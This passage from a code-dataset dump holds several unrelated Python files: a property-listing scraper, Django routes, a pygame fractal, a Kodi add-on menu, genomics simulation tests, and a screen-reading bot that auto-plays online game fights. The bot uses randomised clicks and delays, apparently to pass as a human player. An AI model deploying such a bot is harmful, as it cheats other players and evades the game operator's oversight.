numpy.isin(df['eventid'], events_in_new_not_old['eventid']))]\n writeDataFrameToExcel(new_events_df, filename, 'new')\n\n\n\n","repo_name":"djsouthall/beacon","sub_path":"tools/write_event_dict_to_excel.py","file_name":"write_event_dict_to_excel.py","file_ext":"py","file_size_in_byte":23505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3665314078","text":"def run_main():\n increases = 0\n old_no = -1\n f = open(\"input/day1a.txt\")\n lines = list(map(int, f.readlines()))\n for i in range(0, 1998):\n a = lines[i]\n b = lines[i+1]\n c = lines[i+2]\n current_no = a + b + c\n if -1 < old_no < current_no:\n increases += 1\n old_no = current_no\n print(increases)\n\n\nif __name__ == '__main__':\n run_main()\n","repo_name":"jl881/aoc","sub_path":"2021/day1b.py","file_name":"day1b.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43744444442","text":"import json\nimport re\nimport sys\nfrom urllib.request import urlopen, Request\n\nimport bs4\nimport requests\n\nexceptions = {}\nstatus_codes = {}\n\n\ndef main():\n global total_pages\n url = 'https://www.towerbudapest.com/en/sales'\n hdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 '\n 'Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n property_links = []\n property_data_list = []\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for paragraph in soup.select('p[class*=\"kill-margin\"]'):\n if 'Page' in str(paragraph.contents[0]):\n total_pages = int(paragraph.contents[0].split(' ')[10])\n break\n print(\"found \" + str(total_pages) + \" pages\")\n for i in range(total_pages):\n print('=', end='')\n print()\n while True:\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for tag in soup.findAll('a',\n attrs={\n 'href': re.compile(\"^https://www.towerbudapest.com/en/sales/budapest_property/\")}):\n property_links.append(tag.get('href'))\n rightButton = soup.select('div[class*=\"text-right\"]')[0].select('button')\n print('.', end='')\n sys.stdout.flush()\n if len(rightButton) != 0:\n url = rightButton[0]['onclick'].split(\"'\")[1]\n else:\n print()\n break\n print()\n print(\"found \" + str(len(property_links)) + \" links\")\n property_links = list(set(property_links))\n print(str(len(property_links)) + \" after removing duplicates\")\n for i in range(len(property_links)):\n if i % 10 == 0:\n print('=', end='')\n print()\n counter = 0\n global status_codes\n global exceptions\n for link in property_links:\n try:\n counter += 1\n if counter % 10 == 0:\n print('.', end='')\n sys.stdout.flush()\n property_data = {}\n content = urlopen(Request(link, headers=hdr)).read()\n soup = bs4.BeautifulSoup(content, features=\"lxml\")\n header = soup.select('div[class*=\"property-content\"]')[0].select('h1')[0].contents[0]\n property_data['name'] = header\n details = soup.select('div[class*=\"property-details-sidebar\"]')[0]\n\n for listitem in details.select('ul')[0].select('li'):\n new_key = listitem.select('strong')[0].contents[0].replace(':', '').lower().replace(' ', '')\n if len(listitem.contents) > 1:\n new_value = str(listitem.contents[1]).strip()\n 
if new_value == 'Yes':\n new_value = True\n if new_value == 'No':\n new_value = False\n else:\n new_value = True\n property_data[new_key] = new_value\n\n property_data['pricehuf'] = details.select('ul')[1].select('li')[1].contents[0].split()[0].replace('.', '')\n if len(details.select('ul')[1].select('li')) > 2:\n property_data['priceeur'] = details.select('ul')[1].select('li')[2].contents[0].split()[0].replace('.',\n '')\n\n # property_data['contact'] = details.select('ul')[2].select('li')[1].contents[0]\n\n property_data['name'] = property_data['name'].lower()\n recognized_suffixes = ['utca', 'út', 'tér', 'park']\n recognized_suffixes_english = ['street', 'road', 'square', 'park']\n split_name = (str(property_data['name'])).split()\n for s in split_name:\n if s in recognized_suffixes or s in recognized_suffixes_english:\n if s in recognized_suffixes:\n property_data['streetsuffix'] = s\n if s in recognized_suffixes_english:\n property_data['streetsuffix'] = recognized_suffixes[recognized_suffixes_english.index(s)]\n split_name.remove(s)\n property_data['streetname'] = ' '.join(split_name)\n break\n\n property_data['size'] = int(property_data['size'].split(' ')[0])\n\n property_data_list.append(property_data)\n r = requests.post(\"https://propertybuddy-database.herokuapp.com/properties\", json=property_data)\n # r = requests.post(\"http://localhost:8080/properties\", json=property_data)\n\n latest_status_code = (r.status_code, json.loads(r.content)['message'])\n if latest_status_code in status_codes:\n status_codes[latest_status_code] += 1\n else:\n status_codes[latest_status_code] = 1\n except Exception as e:\n latest_exception = str(e)\n if \"HTTPSConnectionPool\" in latest_exception and \"Max retries exceeded with url\" in latest_exception:\n latest_exception = latest_exception.split(\"(Caused\")[0]\n if latest_exception in exceptions:\n exceptions[latest_exception] += 1\n else:\n exceptions[latest_exception] = 1\n print()\n print()\n print('all done')\n end_print()\n\n\ndef end_print():\n print('status codes:')\n for c in status_codes:\n print(\"\\t\" + str(c[0]) + \"\\tx\" + str(status_codes[c]) + \"\\n\\t\\t\" + str(c[1]))\n print('exceptions:')\n for e in exceptions:\n print(\"\\t\" + e + \"\\tx\" + str(exceptions[e]))\n\n\ntry:\n main()\nexcept KeyboardInterrupt:\n print()\n print()\n print('exiting on user interrupt')\n end_print()\n","repo_name":"zapathy/webscraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25697992927","text":"from django.urls import path\n\nfrom .views import OperationViewSet, CategoryView, CategoryListView, ListOperationsOfBill, FilterOperationsView, \\\n SearchView\n\nurlpatterns = [\n path('operation', OperationViewSet.as_view({\n 'post': 'create',\n 'delete': 'destroy',\n 'put': 'update',\n 'get': 'retrieve'\n })),\n path('operations', OperationViewSet.as_view({\n 'get': 'list'\n })),\n path('operations-of-bill', ListOperationsOfBill.as_view()),\n path('categories', CategoryListView.as_view({\n 'get': 'list'\n })),\n path('category', CategoryView.as_view({\n 'post': 'create'\n })),\n path('filter-operations', FilterOperationsView.as_view()),\n path('search', 
SearchView.as_view())\n]\n","repo_name":"bifenbecker/FinanceControl-bankAccounts","sub_path":"operations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11075056089","text":"import pygame, sys, math\n\nclass observer:\n def __init__(self):\n self.observer_list = []\n\n def add(self, objs):\n self.observer_list += objs\n\n def notify(self, pos):\n for observer in self.observer_list:\n d = observer.on_notify(pos)\n if d: return d\n\n return None\n\n\nclass slider:\n def __init__(self, pos, name, tree):\n self.x, self.y = pos\n self.height = 200\n self.name = name\n self.rect_width, self.rect_height = 20, 10\n self.slide = pygame.Rect((self.x-10,self.y+self.height/2-self.rect_height/2),(self.rect_width, self.rect_height))\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n self.trees = tree\n\n def on_notify(self, pos):\n if (abs(pos[0]-self.x)<20) and (self.y < pos[1] < self.y+self.height):\n self.slide.move_ip(0, pos[1]-self.slide.y)\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n if self.name == \"teta1\": return (self.trees.teta[0], -math.radians(self.degrees))\n else :return (math.radians(self.degrees),self.trees.teta[1])\n return None\n\n\n def draw(self, surface):\n myfont = pygame.font.SysFont(\"\", 15)\n textsurface = myfont.render(\n f\"{self.name} {round(self.degrees,2)}\", False, (0,0,0)\n )\n textRect = textsurface.get_rect()\n textRect.center = (self.x, self.y-10)\n surface.blit(textsurface, textRect)\n\n pygame.draw.line(surface, (0,0,0), (self.x, self.y), (self.x, self.y+self.height), 2)\n pygame.draw.rect(surface, (0,0,110), self.slide)\n\n\nclass tree:\n def __init__(self, size, k, teta):\n self.w, self.h = size\n self.length = 100\n self.k = k\n self.teta = teta\n self.max = 15\n\n def update(self, teta):\n if teta:\n self.teta = teta\n\n def draw(self, surface, line=None, angle=math.pi/2, it=1):\n if not line: line = [(self.w/2, self.h), (self.w/2, self.h*3/4)]\n if it > self.max: return 0\n if it> 7*self.max//10: pygame.draw.line(surface, (71,148,71),line[0], line[1])\n else: pygame.draw.line(surface, (102,51,0),line[0], line[1])\n\n for i in range(2):\n x = self.length*(self.k[i]**it)*math.cos(angle + self.teta[i]) + line[-1][0]\n y = -self.length*(self.k[i]**it)*math.sin(angle + self.teta[i]) + line[-1][1]\n self.draw(surface,[line[-1], (x,y)], angle+self.teta[i], it+1)\n\n\nclass main:\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = (600, 500)\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, 0 , 32)\n self._running = True\n self.tree = tree(self.size, [0.65, 0.75], [math.radians(20), -math.radians(10)])\n self.sliders = [slider((490, 50), \"teta1\", self.tree), slider((560, 50), \"teta2\", self.tree)]\n self.observers = observer()\n self.observers.add(self.sliders)\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n degrees = self.observers.notify(pygame.mouse.get_pos())\n self.tree.update(degrees)\n self.on_loop()\n\n def on_loop(self):\n self._display_surf.fill((255,255,255))\n self.tree.draw(self._display_surf)\n for slider in self.sliders:\n slider.draw(self._display_surf)\n pygame.display.update()\n\n def on_render(self):\n pass\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def 
on_execute(self):\n        if self.on_init() == False:\n            self._running = False\n\n        self.on_loop()\n        while ( self._running ):\n            for event in pygame.event.get():\n                self.on_event(event)\n            self.on_render()\n        self.on_cleanup()\n\nif __name__ == \"__main__\":\n    theApp = main()\n    theApp.on_execute()\n","repo_name":"MasMat2/Fractals","sub_path":"treegame.py","file_name":"treegame.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30776906790","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Defines the StagedMoviesMenu class.\"\"\"\n\nimport xbmcgui\n\nfrom resources import ADDON_NAME\n\nfrom resources.lib.log import logged_function\n\nfrom resources.lib.misc import getstring\nfrom resources.lib.misc import notification\n\n\nclass StagedMoviesMenu():\n    \"\"\"Provide windows for displaying staged movies, and tools for managing the items.\"\"\"\n\n    # TODO: don't commit sql changes for \"... all\" until end\n    # TODO: decorator for \"...all\" commands\n    # TODO: load staged movies on init, use as instance variable, refresh as needed\n\n    def __init__(self, database, progressdialog):\n        \"\"\"__init__ StagedMoviesMenu.\"\"\"\n        self.database = database\n        self.progressdialog = progressdialog\n\n    @logged_function\n    def add_all(self, items):\n        \"\"\"Add all staged movies to library.\"\"\"\n        STR_ADDING_ALL_MOVIES = getstring(32042)\n        STR_ALL_MOVIES_ADDED = getstring(32043)\n        self.progressdialog.create_progressdialog(\n            msg=STR_ADDING_ALL_MOVIES\n        )\n        for index, item in enumerate(items):\n            self.progressdialog.update_progressdialog(\n                index / len(items),\n                item.title()\n            )\n            item.add_to_library()\n        self.progressdialog.close_progressdialog()\n        notification(STR_ALL_MOVIES_ADDED)\n\n    @staticmethod\n    def rename_dialog(item):\n        \"\"\"Prompt input for new name, and rename if non-empty string.\"\"\"\n        # TODO: move to utils or parent class so it's not duplicated\n        input_ret = xbmcgui.Dialog().input(\n            \"Title\",\n            defaultt=item.title()\n        )\n        if input_ret:\n            item.rename(input_ret)\n\n    @logged_function\n    def options(self, item):\n        \"\"\"Provide options for a single staged movie in a dialog window.\"\"\"\n        STR_ADD = getstring(32048)\n        STR_REMOVE = getstring(32017)\n        STR_REMOVE_AND_BLOCK = getstring(32049)\n        STR_RENAME = getstring(32050)\n        STR_STAGED_MOVIE_OPTIONS = getstring(32053)\n        STR_BACK = getstring(32011)\n        lines = [\n            STR_ADD,\n            STR_REMOVE,\n            STR_REMOVE_AND_BLOCK,\n            # STR_RENAME,\n            STR_BACK\n        ]\n        ret = xbmcgui.Dialog().select(\n            '{0} - {1} - {2}'.format(\n                ADDON_NAME,\n                STR_STAGED_MOVIE_OPTIONS,\n                item.title()),\n            lines\n        )\n        if ret >= 0:\n            if lines[ret] == STR_ADD:\n                item.add_to_library()\n                self.view_all()\n            elif lines[ret] == STR_REMOVE:\n                item.delete()\n                self.view_all()\n            elif lines[ret] == STR_REMOVE_AND_BLOCK:\n                item.remove_and_block()\n                self.view_all()\n            elif lines[ret] == STR_RENAME:\n                self.rename_dialog(item)\n                self.options(item)\n            elif lines[ret] == STR_BACK:\n                return\n\n        else:\n            self.view_all()\n\n    @logged_function\n    def remove_all(self):\n        \"\"\"Remove all staged movies.\"\"\"\n        STR_REMOVING_ALL_MOVIES = getstring(32013)\n        STR_ALL_MOVIES_REMOVED = getstring(32014)\n        self.progressdialog.create_progressdialog(\n            msg=STR_REMOVING_ALL_MOVIES\n        )\n        self.database.delete_item_from_table_with_status_or_showtitle(\n            _type='movie',\n            status='staged'\n        )\n        self.progressdialog.close_progressdialog()\n        notification(STR_ALL_MOVIES_REMOVED)\n\n    @logged_function\n    def view_all(self):\n        \"\"\"\n        Display all staged movies, which are 
selectable and lead to options.\n\n Also provides additional options at bottom of menu.\n \"\"\"\n STR_NO_STAGED_MOVIES = getstring(32037)\n STR_ADD_ALL_MOVIES = getstring(32038)\n STR_REMOVE_ALL_MOVIES = getstring(32009)\n STR_BACK = getstring(32011)\n STR_STAGED_MOVIES = getstring(32004)\n staged_movies = list(\n self.database.get_content_items(\n status='staged',\n _type='movie'\n )\n )\n if not staged_movies:\n xbmcgui.Dialog().ok(ADDON_NAME, STR_NO_STAGED_MOVIES)\n return\n lines = [str(x) for x in staged_movies]\n lines += [\n STR_ADD_ALL_MOVIES,\n STR_REMOVE_ALL_MOVIES,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1}'.format(ADDON_NAME, STR_STAGED_MOVIES), lines\n )\n if ret >= 0:\n if ret < len(staged_movies): # staged item\n for i, item in enumerate(staged_movies):\n if ret == i:\n self.options(item)\n break\n elif lines[ret] == STR_ADD_ALL_MOVIES:\n self.add_all(staged_movies)\n elif lines[ret] == STR_REMOVE_ALL_MOVIES:\n self.remove_all()\n elif lines[ret] == STR_BACK:\n return\n","repo_name":"curdh/script.library.integration.tool","sub_path":"resources/lib/menus/staged_movies.py","file_name":"staged_movies.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"7955729399","text":"import numpy as np\nimport pytest\nfrom pandas._testing import assert_frame_equal\n\nfrom pandas_genomics import sim\nfrom pandas_genomics.sim import BAMS, SNPEffectEncodings, PenetranceTables\n\n\ndef assert_frame_not_equal(*args, **kwargs):\n try:\n assert_frame_equal(*args, **kwargs)\n except AssertionError:\n # frames are not equal\n pass\n else:\n # frames are equal\n raise AssertionError\n\n\n@pytest.mark.parametrize(\n \"pen_table,baseline,diff,expected\",\n [\n (sim.PenetranceTables.NULL, 0.1, 0.8, [0.5] * 9),\n (sim.PenetranceTables.NULL, 0.0, 0.5, [0.25] * 9),\n (\n sim.PenetranceTables.HET_HET,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n np.array(sim.PenetranceTables.HET_HET.value).reshape((3, 3)) * 10,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n sim.PenetranceTables.HET_HA,\n 0.1,\n 0.9,\n [0.1, 0.1, 0.1, 0.1, 0.1, 1.0, 0.1, 0.1, 0.1],\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n -1,\n 0,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n ],\n)\ndef test_pen_table_direct(pen_table, baseline, diff, expected):\n \"\"\"Test calculation of final penetrance table when a penetrance table is specified\"\"\"\n model = BAMS(pen_table=pen_table, penetrance_base=baseline, penetrance_diff=diff)\n np.isclose(model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))).all()\n\n\n@pytest.mark.parametrize(\n \"eff1,eff2,baseline,diff,main1,main2,interaction,expected\",\n [\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 0,\n [0.1, 0.5, 0.5, 0.5, 0.9, 0.9, 0.5, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 0,\n 0,\n 1,\n [0.1, 0.1, 0.1, 0.1, 0.9, 0.9, 0.1, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 10,\n [0.1, 1 / 6, 1 / 6, 1 / 
6, 0.9, 0.9, 1 / 6, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.ADDITIVE,\n sim.SNPEffectEncodings.RECESSIVE,\n 0.2,\n 0.4,\n 1,\n 1,\n -1,\n [0.2, 0.4, 0.6, 0.2, 0.4, 0.6, 0.6, 0.6, 0.6],\n ),\n ],\n)\ndef test_pen_table_model(\n eff1, eff2, baseline, diff, main1, main2, interaction, expected\n):\n \"\"\"Test calculation of final penetrance table from a model\"\"\"\n model = BAMS.from_model(\n eff1=eff1,\n eff2=eff2,\n penetrance_base=baseline,\n penetrance_diff=diff,\n main1=main1,\n main2=main2,\n interaction=interaction,\n )\n assert np.isclose(\n model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))\n ).all()\n\n\ndef test_random_seed():\n test_sim = BAMS.from_model(\n SNPEffectEncodings.RECESSIVE,\n SNPEffectEncodings.RECESSIVE,\n main1=1,\n main2=1,\n interaction=1,\n random_seed=123,\n )\n\n # Test simulating data using random seeds\n original_cc_sim = test_sim.generate_case_control(snr=0.1)\n original_quant_sim = test_sim.generate_quantitative(snr=0.1)\n repeat_cc_sim = test_sim.generate_case_control(snr=0.1)\n repeat_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(456)\n newseed_cc_sim = test_sim.generate_case_control(snr=0.1)\n newseed_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(123)\n redo_cc_sim = test_sim.generate_case_control(snr=0.1)\n redo_quant_sim = test_sim.generate_quantitative(snr=0.1)\n\n # Subsequent runs are different\n assert_frame_not_equal(original_cc_sim, repeat_cc_sim)\n assert_frame_not_equal(original_quant_sim, repeat_quant_sim)\n\n # New seed should be different\n assert_frame_not_equal(original_cc_sim, newseed_cc_sim)\n assert_frame_not_equal(original_quant_sim, newseed_quant_sim)\n\n # Resetting seed should match original\n assert_frame_equal(original_cc_sim, redo_cc_sim)\n assert_frame_equal(original_quant_sim, redo_quant_sim)\n\n\ndef test_null():\n bas = BAMS(PenetranceTables.NULL)\n simulated = bas.generate_case_control(10000, 1000, 0.1, 0.1)\n # maf should be similar to the specified one despite a large fraction of cases\n # specifically assert it is within 5%\n assert abs(0.1 - simulated[\"SNP1\"].genomics.maf) / 0.1 < 0.05\n","repo_name":"HallLab/pandas-genomics","sub_path":"tests/simulation/test_biallelic_sim.py","file_name":"test_biallelic_sim.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"32"} +{"seq_id":"8626666688","text":"import pyautogui\nimport cv2\nimport numpy as np\nimport time\nfrom Divers import Divers as divers\nimport random\nimport copy\n\ndef combat_fini():\n template = cv2.imread('Picture/fermer_combat.png', 0)\n template_BW = cv2.threshold(template, 100, 255, cv2.THRESH_BINARY)[1]\n image = pyautogui.screenshot(region=(571, 416, 90, 230))\n # image.show()\n img_rgb = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\n img_BW = cv2.threshold(img_gray, 100, 255, cv2.THRESH_BINARY)[1]\n res2 = cv2.matchTemplate(img_BW, template_BW, cv2.TM_SQDIFF_NORMED)\n threshold = 0.1\n\n # Store the coordinates of matched area in a numpy array\n if np.any(res2 <= threshold):\n position = np.where(res2 <= threshold)\n result = (1, position[1][0]+571, position[0][0]+416)\n else:\n result = (0, 20, 20)\n return result\n\n\ndef click_combat_fini(pause=[False]):\n bool_fini = combat_fini()\n if bool_fini[0] == 1:\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n\n\ndef findperso(color1, color2, 
color3, dist=10, tol=4):\n now = pyautogui.screenshot\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color1, sauf=pos_nope, tol=tol)\n # print(pos1)\n # print(pos_nope)\n if pos1:\n if divers.findcolor(color2, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color2, sauf=pos_nope, tol=tol)\n if pos1:\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n return None\n\n\ndef obstacle(origine):\n dX = 2\n dY = 2\n color = (34, 51, 153)\n tol = 2\n\n color = np.uint8([[[color[0], color[1], color[2] ]]])\n hsv_color = cv2.cvtColor(color, cv2.COLOR_RGB2HSV)\n\n lower_limit = np.array([hsv_color[0][0][0]-tol, hsv_color[0][0][1]-tol, hsv_color[0][0][2]-tol])\n upper_limit = np.array([hsv_color[0][0][0]+tol, hsv_color[0][0][1]+tol, hsv_color[0][0][2]+tol])\n\n frame = pyautogui.screenshot()\n hsv = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2HSV)\n mask = cv2.inRange(hsv, lower_limit, upper_limit)\n\n height, width = mask.shape\n U = (28.2, 14)\n V = (28.2, -14)\n porte = 11\n obstacle_dico = {}\n for i in range(-porte, porte+1):\n porte2 = porte - abs(i)\n for j in range(-porte2, porte2 + 1):\n actuel = (np.int64(origine[0] + i * U[0] + j*V[0]), np.int64(origine[1] + i * U[1] + j*V[1]))\n zone_chercher = np.zeros((height, width, 1), np.uint8)\n initial = (actuel[0] - dX, actuel[1] - dY)\n final = (actuel[0] + dX, actuel[1] + dY)\n # print(initial,final)\n cv2.rectangle(zone_chercher, initial, final, (255), -1)\n res = cv2.bitwise_and(zone_chercher, zone_chercher, mask=mask)\n result1, result2 = np.where(res == 255)\n if(len(result1)):\n obstacle_dico[(i, j)] = True\n # else:\n # obstacle_dico[(i,j)] = False\n return obstacle_dico\n # frame2 = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)\n # for i in obstacle_dico.keys():\n # if obstacle_dico[i]:\n # actuel = (np.int64(origine[0] + i[0] * U[0] + i[1]*V[0]), np.int64(origine[1] + i[0] * U[1] + i[1]*V[1]))\n # cv2.rectangle(frame2,(actuel[0] - 2,actuel[1] - 2),(actuel[0] + 2,actuel[1] + 2),(255,255,255),-1)\n #\n # cv2.imshow('frame',frame2)\n # k = cv2.waitKey()\n\n\ndef findpath(obstacleexterne, pos, but):\n try:\n obstacle_dico = copy.deepcopy(obstacleexterne)\n obstacle_dico[but] = True\n libre = list(obstacle_dico.keys())\n if pos in libre:\n libre.remove(pos)\n list_pos_actuelle = [pos]\n list_pos_nouvelle = []\n dico_pos = {pos: 0}\n accessible = []\n for i in range(1, 31):\n for j in list_pos_actuelle:\n for k in voisin(j):\n if k in libre:\n libre.remove(k)\n dico_pos[k] = i\n list_pos_nouvelle.append(k)\n accessible.append(k)\n if not (but in libre):\n break\n list_pos_actuelle = list_pos_nouvelle\n list_pos_nouvelle = []\n\n pos_actuelle = but\n path = []\n if not (but in accessible):\n dist_min = 1000\n for i in accessible:\n if (abs(but[0]-i[0]) + abs(but[1]-i[1])) < dist_min:\n dist_min = (abs(but[0]-i[0]) + abs(but[1]-i[1]))\n pos_actuelle = i\n\n for i in range(dico_pos[pos_actuelle]-1, 0, -1):\n for j in voisin(pos_actuelle):\n try:\n if dico_pos[j] == i:\n path.append(j)\n pos_actuelle = j\n break\n except:\n continue\n return path\n 
except:\n        # on any failure, return an empty path instead of falling through to None\n        path = []\n        return path\n\n\ndef voisin(pos):\n    return [(pos[0]+1, pos[1]), (pos[0]-1, pos[1]), (pos[0], pos[1]+1), (pos[0], pos[1]-1)]\n\ndef ligne_de_vue(obstacle, pos,but):\n    try:\n        obstacle_dico = copy.deepcopy(obstacle)\n        obstacle_dico[pos] = True\n        obstacle_dico[but] = True\n        dist = abs(but[1]-pos[1]) + abs(but[0]-pos[0])\n        if (but[0]-pos[0]) == 0:\n            dX = np.arange(0, but[1]-pos[1], ((but[1]-pos[1])/dist))\n            pente = (but[0]-pos[0])/(but[1]-pos[1])\n            X = np.arange(pos[1], but[1], ((but[1]-pos[1])/dist))\n        else:\n            dX = np.arange(0, but[0]-pos[0], ((but[0]-pos[0])/dist))\n            pente = (but[1]-pos[1])/(but[0]-pos[0])\n            X = np.arange(pos[0], but[0], ((but[0]-pos[0])/dist))\n        Y = []\n        for i in dX:\n            Y.append(pente*i + pos[1])\n\n        # print(X)\n        # print(Y)\n        for i in range(len(X)):\n            try:\n                if (but[0]-pos[0]) == 0:\n                    obstacle_dico[(round(Y[i]), round(X[i]))]\n                else:\n                    obstacle_dico[(round(X[i]), round(Y[i]))]\n            except:\n                return False\n        return True\n    except:\n        return False\n\n\ndef pos_abs_2_rel(pos, origine):\n    # U = (36.3, 18.1)\n    # V = (36.3,-18.1)\n    dX = 28.2\n    dY = 14\n\n    X = round((pos[0] - origine[0])/dX)\n    Y = round((pos[1] - origine[1])/dY)\n\n    a = (X + Y)/2\n    b = X - a\n    return (a,b)\n\ndef pos_rel_2_abs(pos, origine):\n    U = (28.2, 14)\n    V = (28.2, -14)\n    pos_abs = (np.int64(origine[0] + pos[0] * U[0] + pos[1] * V[0]), np.int64(origine[1] + pos[0] * U[1] + pos[1] * V[1]))\n    return pos_abs\n\ndef modeTacticCreature(pause= [False]):\n    if(divers.findcolor((173, 173, 173),(872, 686),(879, 693))):\n        divers.move_mouse(872, 686,6,7, vitesse=1.5, pause= pause)\n        time.sleep(0.8 + random.random() * 0.5)\n\n    if(divers.findcolor((173, 173, 173),(891, 686),(897, 693))):\n        divers.move_mouse(891,686,6,7, vitesse=1.5, pause= pause)\n        time.sleep(0.8 + random.random() * 0.5)\n    return\n\ndef combat(option, pause= [False]):\n    try:\n        ColorNextTurn = (213, 243, 0)\n        #cra = [(253, 190, 45),(216, 138, 22),(119, 74, 2)]#Enutrof colors\n        cra = [(253, 57, 36), (196, 19, 0), (101, 11, 1)]#Cra colors\n        creature = [(77, 77, 93), (46, 54, 61), (126, 126, 142)]\n        Sort_Sans_Vue = (595, 667)\n        Sort_Avec_Vue = (621, 667)\n        PO_Sort = option.po\n        pm = option.pm\n\n        pos_ennemi = (0, 0)\n        obst = {}\n        if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n            bool_fini = (1, 570, 433)\n            modeTacticCreature()\n            ColorEndFight = (191, 230, 0)\n            pos_perso = findperso(cra[0], cra[1], cra[2])\n            if (pos_perso == None):\n                pos_perso = findperso(cra[0], cra[1], cra[2])\n            origine = (pos_perso[0]+2, pos_perso[1]+15)\n\n            while(True):\n                modeTacticCreature()\n                #starts the fight on the first turn, then just passes the turn afterwards\n                for i in range(0, 20):\n                    time.sleep(0.3)\n                    if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n                        break\n                    if combat_fini()[0] == 1:\n                        i = 19\n                        bool_fini = combat_fini()\n                        break\n                    if ((i+1) % 10) == 0:\n                        divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n                if i == 19:\n                    break\n\n                divers.move_mouse(882, 646, 65, 20, alea=False, pause=pause)\n                divers.move_mouse(1083, 388, 150, 160, alea=False, pause=pause)\n\n                #waits for our turn to play\n                for i in range(0, 50):\n                    time.sleep(0.3)\n                    if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n                        break\n                    if combat_fini()[0] == 1:\n                        i = 49\n                        bool_fini = combat_fini()\n                        break\n                    if ((i + 1) % 15) == 0:\n                        divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n                if i == 49:\n                    break\n\n                #Click the spell that needs no line of sight\n                bool_sort = False\n                if not(pos_ennemi in list(obst.keys())):\n                    bool_sort = True\n                    divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, vitesse=2, 
